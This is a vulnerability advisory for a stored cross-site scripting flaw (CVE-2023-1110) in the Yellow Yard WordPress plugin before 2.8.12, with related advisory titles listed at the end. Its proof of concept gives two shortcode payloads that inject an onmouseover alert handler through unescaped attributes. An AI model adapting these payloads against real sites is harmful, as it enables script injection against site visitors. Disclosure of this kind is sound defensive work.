Yellow Yard < 2.8.12 – Contributor+ Stored XSS | CVE 2023-1110 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[yy_filter field='" style=background-color:red onmouseover=alert(/XSS/)//']

Other affected attributes: type, title

[yy_filter_container class='" style=background-color:red onmouseover=alert(/XSS/)//']

Other affected attribute: action

Affects Plugins

Fixed in 2.8.12

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

1830e829-4a43-4d98-8214-eecec6bef694

Timeline

Publicly Published

2023-02-07 (about 2 years ago)

Added

2023-04-26 (about 2 years ago)

Last Updated

2023-04-26 (about 2 years ago)

Other

Published

Title

Published

2023-03-14

Title

Yandex.News Feed by Teplitsa <= 1.12.5 - Admin+ Stored XSS

Published

2015-08-04

Title

Ninja Forms <= 2.9.21 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2023-05-22

Title

WooCommerce Follow-Up Emails < 4.9.50 - Unauthenticated Reflected XSS

Published

2021-12-24

Title

Affiliates Manager < 2.9.0 - Unauthenticated Stored Cross-Site Scripting

Published

2025-10-03

Title

WP Photo Album Plus < 9.0.11.007 - Authenticated (Subscriber+) Stored Cross-Site Scripting via wppa_user_upload